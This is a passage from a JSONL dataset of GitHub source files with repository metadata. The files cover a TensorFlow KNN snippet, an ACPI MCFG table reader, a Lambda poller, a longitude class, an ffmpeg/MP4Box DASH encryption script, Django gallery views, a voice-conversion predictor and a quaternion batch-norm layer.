784])\ny = tf.placeholder(\"float\",[None, 10])\nl1_dist = tf.reduce_sum(tf.abs(tf.sub(x, target_x)), 1)\nl2_dist = tf.reduce_sum(tf.square(tf.sub(x, target_x)), 1)\nnn = tf.nn.top_k(-l1_dist, k)\ninit = tf.initialize_all_variables()\naccuracy_history = []\nwith tf.Session() as sess:\n\tsess.run(init)\n","repo_name":"somiljain7/AI","sub_path":"KNN-ALGORITHM/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"2751562811","text":"#\r\n# AcpiMcfg.py\r\n#\r\n# Copyright (C) 2018 efipy.core@gmail.com All rights reserved.\r\n#\r\n# AcpiMcfg.py is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, version 2 of the License.\r\n#\r\n# AcpiMcfg.py is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with EfiPy. If not, see .\r\n#\r\n\r\nimport EfiPy\r\nfrom EfiPyAcpiBase import AcpiTables\r\nfrom EfiPy.MdePkg.IndustryStandard import EFIPY_INDUSTRY_STRUCTURE\r\nfrom EfiPy.MdePkg.IndustryStandard.MemoryMappedConfigurationSpaceAccessTable import EFI_ACPI_MEMORY_MAPPED_ENHANCED_CONFIGURATION_SPACE_BASE_ADDRESS_ALLOCATION_STRUCTURE as MCFG_ENTRY\r\nfrom EfiPy.MdePkg.IndustryStandard.MemoryMappedConfigurationSpaceAccessTable import EFI_ACPI_MEMORY_MAPPED_CONFIGURATION_BASE_ADDRESS_TABLE_HEADER as MCFG_HEADER\r\n\r\nMcfgSize = 0\r\nMcfgAddress = 0\r\n\r\nfor _signature, _address, _size in AcpiTables:\r\n if _signature == 'MCFG':\r\n McfgAddress = _address\r\n _McfgHeader = MCFG_HEADER.from_address (McfgAddress)\r\n McfgSize = _size\r\n break;\r\n\r\nif McfgAddress == 0:\r\n raise ImportError ('MCFG Not found')\r\n\r\nclass MCFG_TABLE_CLASS (EFIPY_INDUSTRY_STRUCTURE):\r\n _fields_ = [\r\n (\"Header\", MCFG_HEADER),\r\n (\"McfgEntry\", MCFG_ENTRY * ((McfgSize - EfiPy.sizeof (MCFG_HEADER)) / EfiPy.sizeof (MCFG_ENTRY)))\r\n ]\r\n\r\nAddress = McfgAddress\r\nSize = McfgSize\r\nTable = MCFG_TABLE_CLASS.from_address (McfgAddress)\r\nRevision = Table.Header.Header.Revision","repo_name":"melxman/UEFI-BIOS-Flasher","sub_path":"StdLib/lib/python.27/site-packages/EfiPyLib/Acpi/AcpiMcfg.py","file_name":"AcpiMcfg.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"35797760965","text":"import blog_poller\nimport ubw_poller\nimport traceback\nimport yr_poller\n\n\ndef lambda_handler(event, context):\n # This is a list of polling methods that should be run once every day.\n pollings = [\n ubw_poller.poll,\n blog_poller.poll,\n yr_poller.poll,\n ]\n errors = 0\n for poll in pollings:\n try:\n poll()\n except:\n # If one of the polling methods fails it should not stop the others from running.\n traceback.print_exc()\n errors += 1\n\n if errors == 0:\n return {\n 'statusCode': 200,\n 'body': ''\n }\n\n else:\n return {\n 'statusCode': 500,\n 'body': ''\n }\n","repo_name":"Tinusf/Dataplattform","sub_path":"services/poller/daily_poller/daily_poller.py","file_name":"daily_poller.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"4015730929","text":"import softwareprocess.Angle as A\n\nclass Longitude(A.Angle):\n def setDegreesFloat(self, degNum):\n longitudeTooLowStr = 'The longitude specified is too low! It must be greater than or equal to 0 degrees and 0.0 minutes'\n longitudeTooHighStr = 'The longitude specified is too high! It must be less than 360 degrees and 0.0 minutes'\n if isinstance(degNum, (int, float, long)):\n if degNum < 0:\n raise ValueError(longitudeTooLowStr)\n elif degNum >= 360:\n raise ValueError(longitudeTooHighStr)\n A.Angle.setDegreesFloat(self, degNum)","repo_name":"agupta7/COMP6700","sub_path":"softwareprocess/angles/Longitude.py","file_name":"Longitude.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8112662685","text":"#imports\nimport subprocess\nimport os,binascii\nimport xml.etree.ElementTree as ET\nimport json\nimport os, errno\nimport shutil\ndef execute( bash_command ): #for running bash command\n # to remove any output\n # p = subprocess.Popen(bash_command, stdout=subprocess.PIPE) \n p = subprocess.Popen(bash_command) \n (output, err) = p.communicate()\n print(err)\n return err\n\ndef createdir( path ): #for creating any directory\n try:\n try:\n original_umask = os.umask(0)\n os.makedirs(path, 0o777)\n finally:\n os.umask(original_umask)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\nbitrates = { \"700\":288, \"1000\":360, \"1500\":480, \"2000\":576 }\noffbitrate = \"1000\"\n\npath = './video_upload'\nfiles = os.listdir(path)\nfor name in files:\n\n #variable names\n x,y = os.path.splitext(name)\n vidName = x\n \n createdir('./video_uploaded/' + vidName)\n\n #split source file to audio and video\n \n command = [\"ffmpeg\", \"-i\", \"./video_upload/\"+vidName+\".mp4\" ,\"-c:v\" ,\"copy\", \"-an\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video.mp4\"]\n execute(command)\n command = [\"ffmpeg\", \"-i\", \"./video_upload/\"+vidName+\".mp4\" ,\"-c:a\" ,\"copy\", \"-vn\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-audio.mp4\"]\n execute(command)\n\n #change to different bitrates\n\n #scale=\"trunc(oh*a/2)*2:720\"\n\n for bitrate in bitrates:\n # wierd = '''\"scale='trunc(oh*a/2)*2:'''+str(bitrates[bitrate])+\"'\\\"\"\n wierd = '''scale='trunc(oh*a/2)*2:'''+str(bitrates[bitrate])+\"'\"\n # wierd = \"scale=\\\"trunc(oh*a/2)*2:360\\\"\"\n command = [\"ffmpeg\", \"-i\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video.mp4\", \"-an\", \"-c:v\" ,\"libx264\",\"-preset\", \"veryslow\" ,\"-profile:v\", \"high\", \"-level\", \"4.2\", \"-b:v\", bitrate+\"k\", \"-minrate\", bitrate+\"k\", \"-maxrate\", bitrate+\"k\", \"-bufsize\", str(int(bitrate)*2)+\"k\", \"-g\", \"96\", \"-keyint_min\", \"96\", \"-sc_threshold\", \"0\", \"-filter:v\", wierd, \"-pix_fmt\", \"yuv420p\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+bitrate+\"k.mp4\"]\n execute(command)\n\n #make new keys and add to json\n\n KID = \"0x\" + str(binascii.b2a_hex(os.urandom(16)).upper())\n val = \"0x\" + str(binascii.b2a_hex(os.urandom(16)).upper())\n\n entry = {\n \"value\": val, \n \"kid\": KID\n }\n with open(\"./video_uploaded/\"+vidName+\"/\"+vidName+\".json\", mode='w') as feedsjson:\n json.dump(entry, feedsjson)\n\n # change keys in crypt.xml\n\n crypt = ET.parse('crypt.xml')\n elem = crypt.getroot()\n elem[1][0].attrib[\"KID\"] = KID\n elem[1][0].attrib[\"value\"] = val\n crypt.write('crypt.xml')\n\n #encrypt files using clearkey encryption\n\n for bitrate in bitrates:\n command = [\"MP4Box\", \"-crypt\", \"crypt.xml\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+bitrate+\"k.mp4\", \"-out\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+bitrate+\"k-encrypted.mp4\"]\n execute(command)\n # for audio\n execute([\"MP4Box\", \"-crypt\", \"crypt.xml\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-audio.mp4\", \"-out\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-audio-encrypted.mp4\"])\n\n #create folder\n createdir('./video_online/'+vidName+'/dash')\n createdir('./video_offline/'+vidName+'/dash')\n\n #online\n\n command = [\"MP4Box\", \"-dash\", \"4000\", \"-rap\", \"-frag-rap\", \"-sample-groups-traf\", \"-profile\", \"dashavc264:live\", \"-bs-switching\", \"multi\", \"-url-template\"]\n\n for bitrate in bitrates:\n command.append(\"video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+bitrate+\"k-encrypted.mp4\")\n command.append(\"video_uploaded/\"+vidName+\"/\"+vidName+\"-audio-encrypted.mp4\")\n command.append(\"-out\")\n command.append(\"video_online/\"+vidName+\"/dash/manifest.mp4\")\n execute(command)\n\n #offline\n\n command = [\"MP4Box\", \"-dash\",\"4000\", \"-rap\", \"-frag-rap\", \"-sample-groups-traf\", \"-profile\", \"dashavc264:live\", \"-bs-switching\", \"no\", \"-url-template\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+offbitrate+\"k-encrypted.mp4#video\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-audio-encrypted.mp4#audio\", \"-out\", \"video_offline/\"+vidName+\"/dash/manifest.mp4\"]\n execute(command)\n\n print(\"Completed \" + vidName + \" :)\") \n #upload to s3 bucket script\n\n\n\n #shift file to video_uploaded folder\n shutil.move(\"./video_upload/\" + vidName + \".mp4\", \"./video_uploaded\")\n\n","repo_name":"shero4/drmvideo","sub_path":"python-script/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12229446867","text":"from django.shortcuts import render, redirect \nfrom .models import Gallery, Exhibition\nfrom .forms import ExhibitionForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import login\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.http import JsonResponse\n\ndef home(request):\n return render(request, 'home.html')\n\ndef about(request):\n return render(request, 'about.html')\n\ndef signup(request):\n error_message = ''\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect('home')\n else:\n error_message = 'Invalid sign up - try again'\n form = UserCreationForm()\n context = {'form': form, 'error_message': error_message}\n return render(request, 'registration/signup.html', context)\n\ndef galleries_index(request):\n galleries = Gallery.objects.all()\n return render(request, 'galleries/galleries_index.html', {\n 'galleries': galleries\n })\n\ndef galleries_detail(request, gallery_id):\n gallery = Gallery.objects.get(id=gallery_id)\n exhibitions = Exhibition.objects.filter(gallery_id=gallery_id).order_by('-id')\n exhibition_form = ExhibitionForm()\n return render(request, 'galleries/galleries_detail.html', { 'gallery': gallery, 'exhibitions': exhibitions, 'exhibition_form': exhibition_form })\n\n@login_required\ndef exhibition_create(request, gallery_id):\n if request.method == 'POST':\n form = ExhibitionForm(request.POST)\n if form.is_valid():\n new_exhibition = form.save(commit=False)\n new_exhibition.gallery_id = gallery_id\n new_exhibition.user = request.user\n new_exhibition.save()\n else:\n print(form.errors)\n return redirect('galleries_detail', gallery_id=gallery_id)\n\n@login_required\ndef save_exhibition(request, exhibition_id):\n try:\n exhibition = Exhibition.objects.get(id=exhibition_id)\n exhibition.user_favourite = True\n exhibition.user = request.user\n exhibition.save()\n return JsonResponse({\"success\": True})\n except Exhibition.DoesNotExist:\n return JsonResponse({\"success\": False})\n \ndef exhibitions_saved(request):\n user = request.user\n saved_exhibitions = Exhibition.objects.filter(user=user, user_favourite=True).order_by('-id')\n return render(request, 'exhibitions/exhibitions_saved.html', {'saved_exhibitions': saved_exhibitions})\n\n@login_required\ndef delete_exhibition(request, exhibition_id):\n try:\n exhibition = Exhibition.objects.get(id=exhibition_id)\n exhibition.user_favourite = False\n exhibition.save()\n return JsonResponse({\"success\": True})\n except Exhibition.DoesNotExist:\n return JsonResponse({\"success\": False})","repo_name":"gellisun/side-project","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"753029924","text":"# -*- coding: utf-8 -*-\n# /usr/bin/python2\n\nfrom __future__ import print_function\nimport glob\nimport argparse\nimport sys\nimport os.path\nimport time\n\nfrom scipy import signal\nimport librosa\nimport numpy as np\nimport tensorflow as tf\n\nimport hyperparams as hp\n\nimport matplotlib.pyplot as plt\n\n\nnum_classes = 61\nnum_mags = hp.Default.n_fft / 2 + 1\n\n# HYPER PARAMETERS\nTRAIN_CAP = 1000\nTEST_CAP = 500\nNUM_LAYERS = 5\nNUM_HIDDEN = 100\nLEARNING_RATE = 0.01\nNUM_EPOCHS = 100\nBATCH_SIZE = 20\nKEEP_PROB = 0.9\n\nSAVE_DIR = \"./checkpoint2/save\"\nPLOTTING = True\n\nSAVE_PER_EPOCHS = 1\nRESAMPLE_PER_EPOCHS = 10\n\n\ndef db_to_amplitude(x):\n return 10.0**(x / 10.0)\n\n\ndef preemphasis(x, coeff=0.97):\n '''\n Applies a pre-emphasis filter on x\n '''\n return signal.lfilter([1, -coeff], [1], x)\n\n\ndef deemphasis(x, coeff=0.97):\n return signal.lfilter([1], [1, -coeff], x)\n\n\ndef load_vocab():\n '''\n Returns:\n phn2idx - A dictionary containing phoneme string to index mappings\n idx2phn - A dictionary containing index to phoneme mappings (reverse of phn2idx)\n '''\n phns = ['h#', 'aa', 'ae', 'ah', 'ao', 'aw', 'ax', 'ax-h', 'axr', 'ay', 'b', 'bcl',\n 'ch', 'd', 'dcl', 'dh', 'dx', 'eh', 'el', 'em', 'en', 'eng', 'epi',\n 'er', 'ey', 'f', 'g', 'gcl', 'hh', 'hv', 'ih', 'ix', 'iy', 'jh',\n 'k', 'kcl', 'l', 'm', 'n', 'ng', 'nx', 'ow', 'oy', 'p', 'pau', 'pcl',\n 'q', 'r', 's', 'sh', 't', 'tcl', 'th', 'uh', 'uw', 'ux', 'v', 'w', 'y', 'z', 'zh']\n # Phoneme to index mapping\n phn2idx = {phn: idx for idx, phn in enumerate(phns)}\n # Index to phoneme mapping\n idx2phn = {idx: phn for idx, phn in enumerate(phns)}\n\n return phn2idx, idx2phn\n\n\ndef _get_mfcc_log_spec_and_log_mel_spec(wav, preemphasis_coeff, n_fft, win_length, hop_length):\n '''\n Args:\n wav - Wave object loaded using librosa\n\n Returns:\n mfcc - coefficients\n mag - magnitude spectrum\n mel\n '''\n # Pre-emphasis\n y_preem = preemphasis(wav, coeff=preemphasis_coeff)\n\n # Get spectrogram\n D = librosa.stft(y=y_preem, n_fft=n_fft,\n hop_length=hop_length, win_length=win_length)\n mag = np.abs(D)\n\n # Get mel-spectrogram\n mel_basis = librosa.filters.mel(\n hp.Default.sr, hp.Default.n_fft, hp.Default.n_mels) # (n_mels, 1+n_fft//2)\n mel = np.dot(mel_basis, mag) # (n_mels, t) # mel spectrogram\n\n # Get mfccs\n db = librosa.amplitude_to_db(mel)\n mfccs = np.dot(librosa.filters.dct(hp.Default.n_mfcc, db.shape[0]), db)\n\n # Log\n mag = np.log(mag + sys.float_info.epsilon)\n mel = np.log(mel + sys.float_info.epsilon)\n\n # Normalization\n # self.y_log_spec = (y_log_spec - hp.mean_log_spec) / hp.std_log_spec\n # self.y_log_spec = (y_log_spec - hp.min_log_spec) / (hp.max_log_spec - hp.min_log_spec)\n\n return mfccs.T, mag.T, mel.T # (t, n_mfccs), (t, 1+n_fft/2), (t, n_mels)\n\n\ndef get_mags_and_phones(wav_file, sr, trim=False, random_crop=False, length=int(hp.Default.duration / hp.Default.frame_shift + 1)):\n '''\n This is applied in `train1` or `test1` phase.\n\n args:\n wav_file - wave filename\n sr - sampling ratio\n trim - remove 0th index from mfccs[] and phns[]\n random_crop - retrieve a `length` segment from a random starting point\n length - used with `random_crop`\n '''\n\n # Load\n wav, sr = librosa.load(wav_file, sr=sr)\n\n _, mags, _ = _get_mfcc_log_spec_and_log_mel_spec(wav, hp.Default.preemphasis, hp.Default.n_fft,\n hp.Default.win_length,\n hp.Default.hop_length)\n # timesteps\n num_timesteps = mags.shape[0]\n\n # phones (targets)\n phn_file = wav_file.replace(\"wav\", \"lab\")\n phn2idx, idx2phn = load_vocab()\n phns = np.zeros(shape=(num_timesteps,))\n bnd_list = []\n for line in open(phn_file, 'r').read().splitlines():\n if(line != \"#\"):\n start_time, _, phn = line.split()\n bnd = int(float(start_time) * sr // hp.Default.hop_length)\n phns[bnd:] = phn2idx[phn]\n bnd_list.append(bnd)\n\n # Replace pau with h# for consistency with TIMIT\n phns[phns == 44.] = 0.\n\n # Trim\n if trim:\n start, end = bnd_list[1], bnd_list[-1]\n mags = mags[start:end]\n phns = phns[start:end]\n assert (len(mags) == len(phns))\n\n # # Random crop\n # if random_crop:\n # start = np.random.choice(\n # range(np.maximum(1, len(mfccs) - length)), 1)[0]\n # end = start + length\n # mfccs = mfccs[start:end]\n # phns = phns[start:end]\n # assert (len(mfccs) == len(phns))\n\n # # Padding or crop\n # mfccs = librosa.util.fix_length(mfccs, length, axis=0)\n # phns = librosa.util.fix_length(phns, length, axis=0)\n return mags, phns\n\n\ndef load_test_data(phn_file):\n phn2idx, idx2phn = load_vocab()\n phns = np.zeros(shape=(10000,))\n bnd_list = []\n bnd_list.append(0)\n prev_bnd = 0\n for line in open(phn_file, 'r').read().splitlines():\n # For TIMIT files\n # start_point, end_point, phn = line.split()\n # bnd = int(start_point) // hp.Default.hop_length\n # phns[bnd:] = phn2idx[phn]\n # bnd_list.append(bnd)\n # For Arctic files\n if(line != \"#\"):\n end_time, _, phn = line.split()\n bnd = int(float(end_time) * hp.Default.sr // hp.Default.hop_length)\n phns[prev_bnd:bnd] = phn2idx[phn]\n bnd_list.append(bnd)\n prev_bnd = bnd\n phns[phns == 44.] = 0.\n start, end = bnd_list[0], bnd_list[-1]\n phns = phns[start:end]\n return np.array([phns])\n\n\ndef get_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('predict_file', type=str, help='predict file path')\n optional = parser.add_argument_group('hyperparams')\n optional.add_argument('--nh', type=int, required=False,\n help='number of hidden nodes')\n optional.add_argument('--nl', type=int, required=False,\n help='number of lstm layers')\n optional.add_argument('--epochs', type=int, required=False,\n help='number of epochs')\n optional.add_argument('--batch_size', type=int,\n required=False, help='BATCH_SIZE')\n arguments = parser.parse_args()\n global NUM_HIDDEN, NUM_LAYERS, NUM_EPOCHS, BATCH_SIZE\n if arguments.nh:\n NUM_HIDDEN = arguments.nh\n if arguments.nl:\n NUM_LAYERS = arguments.nl\n if arguments.epochs:\n NUM_EPOCHS = arguments.epochs\n if arguments.batch_size:\n BATCH_SIZE = arguments.batch_size\n return arguments\n\n\ndef one_hot(indices, depth=num_classes):\n one_hot_labels = np.zeros((len(indices), depth))\n one_hot_labels[np.arange(len(indices)), indices] = 1\n return one_hot_labels\n\n\ndef set_parameters(nh, nl, epochs, batch_size, keep_prob):\n global NUM_HIDDEN, NUM_LAYERS, NUM_EPOCHS, BATCH_SIZE, KEEP_PROB\n NUM_HIDDEN = nh\n NUM_LAYERS = nl\n NUM_EPOCHS = epochs\n BATCH_SIZE = batch_size\n KEEP_PROB = keep_prob\n\n\ndef spectrogram2wav(mag, n_fft, win_length, hop_length, num_iters, phase_angle=None, length=None):\n assert(num_iters > 0)\n if phase_angle is None:\n phase_angle = np.pi * np.random.rand(*mag.shape)\n spec = mag * np.exp(1.j * phase_angle)\n for i in range(num_iters):\n wav = librosa.istft(spec, win_length=win_length,\n hop_length=hop_length, length=length)\n if i != num_iters - 1:\n spec1 = librosa.stft(\n wav, n_fft=n_fft, win_length=win_length, hop_length=hop_length)\n _, phase = librosa.magphase(spec1)\n phase_angle = np.angle(phase)\n spec = mag * np.exp(1.j * phase_angle)\n return deemphasis(wav)\n\n\nif __name__ == '__main__':\n args = get_arguments()\n predict_file = args.predict_file\n\n graph = tf.Graph()\n with graph.as_default():\n # Input placeholder of shape [BATCH_SIZE, num_frames, num_phn_classes]\n inputs = tf.placeholder(tf.float32, [None, None, num_classes])\n\n # Target placeholder of shape [BATCH_SIZE, num_frames, num__mfcc_features]\n targets = tf.placeholder(tf.int32, [None, None, num_mags])\n\n # List of sequence lengths (num_frames)\n seq_len = tf.placeholder(tf.int32, [None])\n\n keep_prob = tf.placeholder(tf.float32, shape=())\n\n mean = tf.Variable(-3.643601)\n\n std_dev = tf.Variable(2.283052)\n\n # Get a GRU cell with dropout for use in RNN\n def get_a_cell(gru_size, keep_prob=1.0):\n gru = tf.nn.rnn_cell.GRUCell(gru_size)\n drop = tf.nn.rnn_cell.DropoutWrapper(\n gru, output_keep_prob=keep_prob)\n return drop\n\n # Make a multi layer RNN of NUM_LAYERS layers of cells\n stack = tf.nn.rnn_cell.MultiRNNCell(\n [get_a_cell(NUM_HIDDEN, keep_prob) for _ in range(NUM_LAYERS)])\n\n # outputs is the output of the RNN at each time step (frame)\n # RNN has NUM_HIDDEN output nodes\n # outputs has shape [BATCH_SIZE, num_frames, NUM_HIDDEN]\n # The second output is the last state and we will not use that\n (output_fw, output_bw), _ = tf.nn.bidirectional_dynamic_rnn(\n stack, stack, inputs, seq_len, dtype=tf.float32)\n outputs = tf.concat([output_fw, output_bw], axis=2)\n\n # Save input shape for restoring later\n shape = tf.shape(inputs)\n batch_s, max_timesteps = shape[0], shape[1]\n\n # Reshaping to apply the same weights over the timesteps\n # outputs is now of shape [BATCH_SIZE*num_frames, NUM_HIDDEN]\n # So the same weights are trained for each timestep of each sequence\n outputs = tf.reshape(outputs, [-1, 2 * NUM_HIDDEN])\n\n # Truncated normal with mean 0 and stdev=0.1\n # Tip: Try another initialization\n # see https://www.tensorflow.org/versions/r0.9/api_docs/python/contrib.layers.html#initializers\n W = tf.Variable(tf.truncated_normal([2 * NUM_HIDDEN,\n num_mags],\n stddev=0.1))\n # Zero initialization\n b = tf.Variable(tf.constant(0., shape=[num_mags]))\n\n # Doing the affine projection\n predictions = tf.matmul(outputs, W) + b\n\n # Reshaping back to the original shape\n predictions = tf.reshape(predictions, [batch_s, -1, num_mags])\n\n scaled_predictions = predictions * std_dev + mean\n\n # mse_loss = tf.reduce_mean(\n # tf.losses.mean_squared_error(\n # predictions=predictions, labels=targets))\n # define an accuracy assessment operation\n mse_loss = tf.losses.mean_squared_error(predictions, targets)\n\n optimizer = tf.train.AdamOptimizer(\n LEARNING_RATE).minimize(mse_loss)\n\n # finally setup the initialisation operator\n init_op = tf.global_variables_initializer()\n\n with tf.Session(graph=graph) as sess:\n saver = tf.train.Saver()\n SAVE_PATH = SAVE_DIR + '_mag_bigru_{}_{}_{}_{}_{}/model.ckpt'.format(\n NUM_HIDDEN, NUM_LAYERS, LEARNING_RATE, BATCH_SIZE, KEEP_PROB)\n try:\n saver.restore(sess, SAVE_PATH)\n print(\"Model restored.\\n\")\n except:\n # initialise the variables\n sess.run(init_op)\n print(\"Model initialised.\\n\")\n\n predict_inputs = load_test_data(predict_file)\n predict_inputs = np.array(predict_inputs).astype(int)\n\n predict_inputs = np.asarray([one_hot(x) for x in predict_inputs])\n\n num_examples = len(predict_inputs)\n predict_seq_len = [len(x) for x in predict_inputs]\n\n feed = {inputs: predict_inputs,\n seq_len: predict_seq_len,\n keep_prob: 1.0}\n\n outputs = sess.run(scaled_predictions, feed)\n\n print(outputs[0].shape)\n\n audio = spectrogram2wav(np.e**(outputs[0]).T, \n n_fft=hp.Default.n_fft, \n win_length=hp.Default.win_length, \n hop_length=hp.Default.hop_length,\n num_iters=hp.Default.n_iter)\n librosa.output.write_wav(\n \"SA1_pred.wav\", audio, hp.Default.sr, norm=True)\n","repo_name":"nihal111/voice-conversion","sub_path":"predict2mag.py","file_name":"predict2mag.py","file_ext":"py","file_size_in_byte":12334,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"77"} +{"seq_id":"6622601852","text":"def search(ls):\n val = int ( input('Enter the number for search -> '))\n\n flag = False\n found = 0\n\n for i in ls:\n if i == val:\n flag = True\n found=i\n if flag:\n print('Found at ',found)\n else:\n print('Not Found')\n\nsearch([1,2,3,4,5,6,7,8])","repo_name":"shamsunnisa/Python-code","sub_path":"test/search from list.py","file_name":"search from list.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39476039916","text":"#!/usr/bin/env python3\n\nimport argparse\nimport sys\n\ntry:\n from netdisp import NetDisp\nexcept ImportError as e:\n raise RuntimeError(\"Could not import netdisp, make sure its installed or \"\n \"that the exports are sourced\") from e\n\n\ndef parse_args(args):\n parser = argparse.ArgumentParser(description=\"NetDisp Notification\")\n parser.add_argument('ip', type=str, help=\"The IP of the netdisp\")\n parser.add_argument('port', type=int, help=\"The port of the netdisp\")\n return parser.parse_args(args)\n\n\ndef main(args):\n args = parse_args(args)\n\n netdisp = NetDisp(args.ip, args.port)\n\n # Create notification this will override what is currently shown without\n # switching the view. Everything until the view is ended will be part of\n # the notification.\n netdisp.create_notification(timeout_ms=1000).draw_rect(\n (0, 0), 128-1, 64-1).show_text(\"\\n~Notification\").end_view().send()\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"Manewing/netdisp","sub_path":"examples/gui/notification.py","file_name":"notification.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24001139678","text":"def history_recall(singlestate, previous_states):\n #print(singlestate)\n current_state=previous_states[singlestate]\n state_history=[]\n state_history.append(current_state)\n if(current_state!=\"ORIGIN\"):\n state_history+=history_recall(current_state, previous_states)\n return state_history\n\ndef solve(original, goal, generate_sequence, get_priority):\n history={}\n gamestates=[]\n gamestates.append([original, get_priority(original, goal)])\n history[original]=\"ORIGIN\"\n exploredstates=1\n Done=False\n \n while(not Done):\n lead_state=gamestates.pop(0)\n pics=generate_sequence(lead_state[0])\n exploredstates+=1\n new_states=[]\n for pic in pics:\n if(not(pic in history)):\n history[pic]=lead_state[0]\n new_states.append([pic, get_priority(pic, goal)]) \n gamestates+=new_states\n gamestates.sort(key=lambda x : x[1])\n if(gamestates[0][0]==goal):\n Done=True\n statelength=len(gamestates)\n if(((exploredstates/1000)==(int(exploredstates/1000))) and exploredstates>999):\n print(\"\\n Program is not frozen. Has currently checked: \", exploredstates, \" states\")\n print(\"(\", statelength,\" states in que)\")\n if(statelength==0):\n print(\"No solution detected. Press Ctrl+c to abort\")\n \n final_solution=history_recall(gamestates[0][0], history)\n final_solution.reverse()\n final_solution.pop(0)\n final_solution.append(gamestates[0][0])\n #print(final_solution)\n exploredstates+=1\n return final_solution, exploredstates\n","repo_name":"agraubert/8-Board_solver","sub_path":"astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22479030083","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Dec 14 00:39:36 2020\r\n\r\n@author: Edoardo\r\n\"\"\"\r\n\r\nimport torch\r\nfrom torch.nn import Module, Parameter\r\n# import math\r\n\r\ndef moving_average_update(statistic, curr_value, momentum):\r\n \r\n new_value = (1 - momentum) * statistic + momentum * curr_value\r\n \r\n return new_value.data\r\n\r\nclass QuaternionBatchNorm2d(Module):\r\n r\"\"\"Applies a 2D Quaternion Batch Normalization to the incoming data.\r\n \"\"\"\r\n\r\n def __init__(self, num_features, gamma_init=1., beta_param=True, momentum=0.1):\r\n super(QuaternionBatchNorm2d, self).__init__()\r\n self.num_features = num_features // 4\r\n self.gamma_init = gamma_init\r\n self.beta_param = beta_param\r\n self.gamma = Parameter(torch.full([1, self.num_features, 1, 1], self.gamma_init))\r\n self.beta = Parameter(torch.zeros(1, self.num_features * 4, 1, 1), requires_grad=self.beta_param)\r\n self.eps = torch.tensor(1e-5)\r\n \r\n self.register_buffer('moving_var', torch.ones(1) )\r\n self.register_buffer('moving_mean', torch.zeros(4))\r\n self.momentum = momentum\r\n\r\n def reset_parameters(self):\r\n self.gamma = Parameter(torch.full([1, self.num_features, 1, 1], self.gamma_init))\r\n self.beta = Parameter(torch.zeros(1, self.num_features * 4, 1, 1), requires_grad=self.beta_param)\r\n\r\n def forward(self, input):\r\n # print(self.training)\r\n if self.training:\r\n quat_components = torch.chunk(input, 4, dim=1)\r\n \r\n r, i, j, k = quat_components[0], quat_components[1], quat_components[2], quat_components[3]\r\n \r\n mu_r = torch.mean(r)\r\n mu_i = torch.mean(i)\r\n mu_j = torch.mean(j)\r\n mu_k = torch.mean(k)\r\n mu = torch.stack([mu_r,mu_i, mu_j, mu_k], dim=0)\r\n # print('mu shape', mu.shape)\r\n \r\n delta_r, delta_i, delta_j, delta_k = r - mu_r, i - mu_i, j - mu_j, k - mu_k\r\n \r\n quat_variance = torch.mean(delta_r**2 + delta_i**2 + delta_j**2 + delta_k**2)\r\n var = quat_variance\r\n denominator = torch.sqrt(quat_variance + self.eps)\r\n \r\n # Normalize\r\n r_normalized = delta_r / denominator\r\n i_normalized = delta_i / denominator\r\n j_normalized = delta_j / denominator\r\n k_normalized = delta_k / denominator\r\n \r\n beta_components = torch.chunk(self.beta, 4, dim=1)\r\n \r\n # Multiply gamma (stretch scale) and add beta (shift scale)\r\n new_r = (self.gamma * r_normalized) + beta_components[0]\r\n new_i = (self.gamma * i_normalized) + beta_components[1]\r\n new_j = (self.gamma * j_normalized) + beta_components[2]\r\n new_k = (self.gamma * k_normalized) + beta_components[3]\r\n \r\n new_input = torch.cat((new_r, new_i, new_j, new_k), dim=1)\r\n \r\n\r\n # with 